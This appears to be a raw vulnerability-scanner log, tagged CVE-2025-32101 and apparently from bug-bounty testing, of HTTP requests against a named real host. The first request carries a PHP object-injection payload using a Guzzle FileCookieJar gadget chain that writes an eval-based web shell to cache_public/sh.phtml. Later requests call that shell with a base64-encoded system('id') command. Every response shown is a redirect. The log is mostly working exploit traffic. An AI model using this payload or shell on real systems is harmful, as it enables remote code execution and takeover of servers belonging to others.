[CVE-2025-32101] Dumped HTTP request for http://akurateco.bitpanda.com/menu.php


POST /menu.php HTTP/1.1
Host: akurateco.bitpanda.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: close
Content-Length: 695
Content-Type: application/x-www-form-urlencoded
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=O%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A3%3A%7Bs%3A40%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A2%3A%7Bs%3A7%3A%22Expires%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22Value%22%3Bs%3A49%3A%22%3C%3Fphp+eval%28base64_decode%28%24_SERVER%5B%27HTTP_X%27%5D%29%29%3B+%3F%3E%22%3B%7D%7D%7Ds%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A23%3A%22.%2Fcache_public%2Fsh.phtml%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7D
[CVE-2025-32101] Dumped HTTP response http://akurateco.bitpanda.com/menu.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:50 GMT
Location: https://akurateco.bitpanda.com/menu.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

[CVE-2025-32101] Dumped HTTP request for http://akurateco.bitpanda.com/cache_public/sh.phtml


GET /cache_public/sh.phtml HTTP/1.1
Host: akurateco.bitpanda.com
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Connection: close
X: ZWNobyAnMzBydWRnNnNleDU1TmdzdjhITjYweDJkZmRPJy4gc3lzdGVtKCdpZCcpIC4gJzMwcnVkZzZzZXg1NU5nc3Y4SE42MHgyZGZkTyc7
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip


[CVE-2025-32101] Dumped HTTP response http://akurateco.bitpanda.com/cache_public/sh.phtml

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:51 GMT
Location: https://akurateco.bitpanda.com/cache_public/sh.phtml

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

[CVE-2025-32101] Dumped HTTP request for http://akurateco.bitpanda.com/cache_public/sh.php


GET /cache_public/sh.php HTTP/1.1
Host: akurateco.bitpanda.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
X: ZWNobyAnMzBydWRnNnNleDU1TmdzdjhITjYweDJkZmRPJy4gc3lzdGVtKCdpZCcpIC4gJzMwcnVkZzZzZXg1NU5nc3Y4SE42MHgyZGZkTyc7
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip


[CVE-2025-32101] Dumped HTTP response http://akurateco.bitpanda.com/cache_public/sh.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:52 GMT
Location: https://akurateco.bitpanda.com/cache_public/sh.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

